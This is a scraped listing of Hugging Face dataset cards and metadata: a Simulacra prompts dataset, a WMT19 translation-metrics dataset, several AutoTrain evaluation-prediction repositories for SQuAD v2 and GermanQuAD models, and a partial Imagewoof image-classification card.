source_datasets:
- original
tags: []
task_categories:
- translation
task_ids: [] | [] | [
"TAGS\n#region-us \n"
] |
e16e967d01e8a5e796eef1ec263c83b2c3f3fac3 |
The prompts used in the Simulacra Discord bot, as [released](https://github.com/JD-P/simulacra-aesthetic-captions) in the Simulacra Aesthetic Captions repository.
Thanks to deltawave on Discord for supplying this dataset! | BirdL/SimulaPrompts | [
"license:cc0-1.0",
"region:us"
] | 2022-07-26T03:52:06+00:00 | {"license": "cc0-1.0"} | 2022-12-19T22:06:33+00:00 | [] | [] | TAGS
#license-cc0-1.0 #region-us
|
The prompts used in the Simulacra discord bot and released
Thanks to deltawave on discord for supplying this dataset! | [] | [
"TAGS\n#license-cc0-1.0 #region-us \n"
] |
8078e27c5ff4c52d5b85572ed45d36c712a3c423 |
# Dataset Card for WMT19 Metrics Task
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** [WMT19 Metrics Shared Task](https://www.statmt.org/wmt19/metrics-task.html)
- **Repository:** [MT Metrics Eval Github Repository](https://github.com/google-research/mt-metrics-eval)
- **Paper:** [Paper](https://aclanthology.org/W19-5302/)
### Dataset Summary
[More Information Needed]
### Supported Tasks and Leaderboards
[More Information Needed]
### Languages
The dataset comprises the following language pairs:
- de-cs
- de-en
- de-fr
- en-cs
- en-de
- en-fi
- en-gu
- en-kk
- en-lt
- en-ru
- en-zh
- fi-en
- fr-de
- gu-en
- kk-en
- lt-en
- ru-en
- zh-en
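
A minimal loading sketch, assuming each language pair above doubles as a config name (the exact config naming is an assumption -- check the repository for the configs it actually exposes):

```python
from datasets import load_dataset

# "de-en" as a config name is an assumption based on the pair list above.
ds = load_dataset("muibk/wmt19_metrics_task", "de-en")
print(ds)
```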
## Dataset Structure
### Data Instances
[More Information Needed]
### Data Fields
[More Information Needed]
### Data Splits
[More Information Needed]
## Dataset Creation
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
[More Information Needed]
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
[More Information Needed]
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
[More Information Needed]
### Citation Information
[More Information Needed]
### Contributions
Thanks to [@mustaszewski](https://github.com/mustaszewski) for adding this dataset.
| muibk/wmt19_metrics_task | [
"task_categories:translation",
"annotations_creators:expert-generated",
"language_creators:found",
"language_creators:machine-generated",
"language_creators:expert-generated",
"multilinguality:translation",
"size_categories:100K<n<1M",
"license:unknown",
"region:us"
] | 2022-07-26T06:21:28+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["found", "machine-generated", "expert-generated"], "language": ["de-cs", "de-en", "de-fr", "en-cs", "en-de", "en-fi", "en-gu", "en-kk", "en-lt", "en-ru", "en-zh", "fi-en", "fr-de", "gu-en", "kk-en", "lt-en", "ru-en", "zh-en"], "license": ["unknown"], "multilinguality": ["translation"], "size_categories": ["100K<n<1M"], "source_datasets": [], "task_categories": ["translation"], "task_ids": [], "pretty_name": "WMT19 Metrics Shared Task"} | 2022-07-26T09:06:23+00:00 | [] | [
"de-cs",
"de-en",
"de-fr",
"en-cs",
"en-de",
"en-fi",
"en-gu",
"en-kk",
"en-lt",
"en-ru",
"en-zh",
"fi-en",
"fr-de",
"gu-en",
"kk-en",
"lt-en",
"ru-en",
"zh-en"
] | TAGS
#task_categories-translation #annotations_creators-expert-generated #language_creators-found #language_creators-machine-generated #language_creators-expert-generated #multilinguality-translation #size_categories-100K<n<1M #license-unknown #region-us
|
# Dataset Card for WMT19 Metrics Task
## Table of Contents
- Table of Contents
- Dataset Description
- Dataset Summary
- Supported Tasks and Leaderboards
- Languages
- Dataset Structure
- Data Instances
- Data Fields
- Data Splits
- Dataset Creation
- Curation Rationale
- Source Data
- Annotations
- Personal and Sensitive Information
- Considerations for Using the Data
- Social Impact of Dataset
- Discussion of Biases
- Other Known Limitations
- Additional Information
- Dataset Curators
- Licensing Information
- Citation Information
- Contributions
## Dataset Description
- Homepage: WMT19 Metrics Shared Task
- Repository: MT Metrics Eval Github Repository
- Paper: Paper
### Dataset Summary
### Supported Tasks and Leaderboards
### Languages
The dataset comprises the following language pairs:
- de-cs
- de-en
- de-fr
- en-cs
- en-de
- en-fi
- en-gu
- en-kk
- en-lt
- en-ru
- en-zh
- fi-en
- fr-de
- gu-en
- kk-en
- lt-en
- ru-en
- zh-en
## Dataset Structure
### Data Instances
### Data Fields
### Data Splits
## Dataset Creation
### Curation Rationale
### Source Data
#### Initial Data Collection and Normalization
#### Who are the source language producers?
### Annotations
#### Annotation process
#### Who are the annotators?
### Personal and Sensitive Information
## Considerations for Using the Data
### Social Impact of Dataset
### Discussion of Biases
### Other Known Limitations
## Additional Information
### Dataset Curators
### Licensing Information
### Contributions
Thanks to @mustaszewski for adding this dataset.
| [
"# Dataset Card for WMT19 Metrics Task",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage: WMT19 Metrics Shared Task\n- Repository: MT Metrics Eval Github Repository\n- Paper: Paper",
"### Dataset Summary",
"### Supported Tasks and Leaderboards",
"### Languages\n\n\n\nThe dataset comprises the following language pairs:\n- de-cs\n- de-en\n- de-fr\n- en-cs\n- en-de\n- en-fi\n- en-gu\n- en-kk\n- en-lt\n- en-ru\n- en-zh\n- fi-en\n- fr-de\n- gu-en\n- kk-en\n- lt-en\n- ru-en\n- zh-en",
"## Dataset Structure",
"### Data Instances",
"### Data Fields",
"### Data Splits",
"## Dataset Creation",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\nThanks to @github-username for adding this dataset."
] | [
"TAGS\n#task_categories-translation #annotations_creators-expert-generated #language_creators-found #language_creators-machine-generated #language_creators-expert-generated #multilinguality-translation #size_categories-100K<n<1M #license-unknown #region-us \n",
"# Dataset Card for WMT19 Metrics Task",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage: WMT19 Metrics Shared Task\n- Repository: MT Metrics Eval Github Repository\n- Paper: Paper",
"### Dataset Summary",
"### Supported Tasks and Leaderboards",
"### Languages\n\n\n\nThe dataset comprises the following language pairs:\n- de-cs\n- de-en\n- de-fr\n- en-cs\n- en-de\n- en-fi\n- en-gu\n- en-kk\n- en-lt\n- en-ru\n- en-zh\n- fi-en\n- fr-de\n- gu-en\n- kk-en\n- lt-en\n- ru-en\n- zh-en",
"## Dataset Structure",
"### Data Instances",
"### Data Fields",
"### Data Splits",
"## Dataset Creation",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\nThanks to @github-username for adding this dataset."
] |
53514cd2b8c3bccdde0a61348e5ef76d3a6748a6 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/electra-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855583 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:36+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/electra-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:48+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/electra-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/electra-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/electra-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
696f9a3028e982a43e69283dab450a4be0e0f72e | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinybert-6l-768d-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855584 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:41+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/tinybert-6l-768d-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:20+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinybert-6l-768d-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/tinybert-6l-768d-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/tinybert-6l-768d-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
55b89a23287e3762d16ad2ed49412c4dbb00d49a | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-base-uncased-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855585 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:45+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-base-uncased-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:49+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-base-uncased-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-base-uncased-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-base-uncased-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
e5c897042bb83fe95d7f687c51d48ed06f2b55a2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-medium-squad2-distilled
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855586 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:51+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-medium-squad2-distilled", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:27+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-medium-squad2-distilled
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-medium-squad2-distilled\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-medium-squad2-distilled\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
425e4ccec0605e663e762c5a088dcc5c6884329b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-base-squad2-distilled
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855587 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:57+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/xlm-roberta-base-squad2-distilled", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:21:10+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-base-squad2-distilled
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/xlm-roberta-base-squad2-distilled\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/xlm-roberta-base-squad2-distilled\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
0d81b9869910b53d9fac2bddf8d3e2eb2afe8a50 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/gelectra-base-germanquad
* Dataset: deepset/germanquad
* Config: plain_text
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjlree](https://huggingface.co/sjlree) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-deepset__germanquad-7176bd7d-11875589 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T13:38:50+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["deepset/germanquad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/gelectra-base-germanquad", "metrics": [], "dataset_name": "deepset/germanquad", "dataset_config": "plain_text", "dataset_split": "test", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T13:40:30+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/gelectra-base-germanquad
* Dataset: deepset/germanquad
* Config: plain_text
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjlree for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/gelectra-base-germanquad\n* Dataset: deepset/germanquad\n* Config: plain_text\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjlree for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/gelectra-base-germanquad\n* Dataset: deepset/germanquad\n* Config: plain_text\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjlree for evaluating this model."
] |
0b848ff3c9d5c4d515e9fea94415453bc756d489 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/gelectra-large-germanquad
* Dataset: deepset/germanquad
* Config: plain_text
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjlree](https://huggingface.co/sjlree) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-deepset__germanquad-7176bd7d-11875590 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T13:38:52+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["deepset/germanquad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/gelectra-large-germanquad", "metrics": [], "dataset_name": "deepset/germanquad", "dataset_config": "plain_text", "dataset_split": "test", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T13:40:57+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/gelectra-large-germanquad
* Dataset: deepset/germanquad
* Config: plain_text
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjlree for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/gelectra-large-germanquad\n* Dataset: deepset/germanquad\n* Config: plain_text\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjlree for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/gelectra-large-germanquad\n* Dataset: deepset/germanquad\n* Config: plain_text\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjlree for evaluating this model."
] |
8dc1bdb0cbe71fea85bb3a4f14c2c1b57c61d88f |
# Dataset Card for Imagewoof
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** https://github.com/fastai/imagenette#imagewoof
- **Repository:** https://github.com/fastai/imagenette
- **Leaderboard:** https://paperswithcode.com/sota/image-classification-on-imagewoof
### Dataset Summary
A smaller subset of 10 classes from [Imagenet](https://huggingface.co/datasets/imagenet-1k#dataset-summary) that aren't so easy to classify, since they're all dog breeds.
This dataset was created by [Jeremy Howard](https://twitter.com/jeremyphoward), and this repository is only there to share his work on this platform. The repository owner takes no credit of any kind in the creation, curation or packaging of the dataset.
### Supported Tasks and Leaderboards
- `image-classification`: The dataset can be used to train a model for Image Classification.
### Languages
The class labels in the dataset are in English.
## Dataset Structure
### Data Instances
A data point comprises an image and its classification label.
```
{
'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=320x320 at 0x19FA12186D8>,
'label': 'Beagle',
}
```
### Data Fields
- `image`: A `PIL.Image.Image` object containing the image.
- `label`: the expected class label of the image.
### Data Splits
| |train|validation|
|---------|----:|---------:|
|imagewoof| 9025| 3929|
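
For reference, here is a minimal sketch of loading the dataset with the Hugging Face `datasets` library. The config name `"full_size"` is an assumption (the upstream Imagewoof releases also ship 160px and 320px variants), so check the repository for the exact config names.

```python
from datasets import load_dataset

# Assumption: a "full_size" config exists, mirroring the upstream Imagewoof
# releases; "160px" and "320px" variants may also be available.
dataset = load_dataset("frgfm/imagewoof", "full_size", split="train")

example = dataset[0]
print(example["image"].size, example["label"])  # PIL image dimensions and class label
```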
## Dataset Creation
### Curation Rationale
cf. https://huggingface.co/datasets/imagenet-1k#curation-rationale
### Source Data
#### Initial Data Collection and Normalization
Imagewoof is a subset of [ImageNet](https://huggingface.co/datasets/imagenet-1k). Information about data collection of the source data can be found [here](https://huggingface.co/datasets/imagenet-1k#initial-data-collection-and-normalization).
### Annotations
#### Annotation process
cf. https://huggingface.co/datasets/imagenet-1k#annotation-process
#### Who are the annotators?
cf. https://huggingface.co/datasets/imagenet-1k#who-are-the-annotators
### Personal and Sensitive Information
cf. https://huggingface.co/datasets/imagenet-1k#personal-and-sensitive-information
## Considerations for Using the Data
### Social Impact of Dataset
cf. https://huggingface.co/datasets/imagenet-1k#social-impact-of-dataset
### Discussion of Biases
cf. https://huggingface.co/datasets/imagenet-1k#discussion-of-biases
### Other Known Limitations
cf. https://huggingface.co/datasets/imagenet-1k#other-known-limitations
## Additional Information
### Dataset Curators
cf. https://huggingface.co/datasets/imagenet-1k#dataset-curators
and Jeremy Howard
### Licensing Information
[Apache License 2.0](https://www.apache.org/licenses/LICENSE-2.0).
### Citation Information
```
@software{Howard_Imagewoof_2019,
title={Imagewoof: a subset of 10 classes from Imagenet that aren't so easy to classify},
author={Jeremy Howard},
year={2019},
month={March},
publisher = {GitHub},
url = {https://github.com/fastai/imagenette#imagewoof}
}
```
### Contributions
This dataset was created by [Jeremy Howard](https://twitter.com/jeremyphoward) and published on [Github](https://github.com/fastai/imagenette). It was then only integrated into HuggingFace Datasets by [@frgfm](https://huggingface.co/frgfm).
| frgfm/imagewoof | [
"task_categories:image-classification",
"annotations_creators:crowdsourced",
"language_creators:crowdsourced",
"size_categories:1K<n<10K",
"source_datasets:extended",
"language:en",
"license:apache-2.0",
"region:us"
] | 2022-07-26T14:21:56+00:00 | {"annotations_creators": ["crowdsourced"], "language_creators": ["crowdsourced"], "language": ["en"], "license": ["apache-2.0"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": ["extended"], "task_categories": ["image-classification"], "task_ids": [], "paperswithcode_id": "imagewoof", "pretty_name": "Imagewoof"} | 2022-12-11T22:26:18+00:00 | [] | [
"en"
] | TAGS
#task_categories-image-classification #annotations_creators-crowdsourced #language_creators-crowdsourced #size_categories-1K<n<10K #source_datasets-extended #language-English #license-apache-2.0 #region-us
| Dataset Card for Imagewoof
==========================
Table of Contents
-----------------
* Table of Contents
* Dataset Description
+ Dataset Summary
+ Supported Tasks and Leaderboards
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
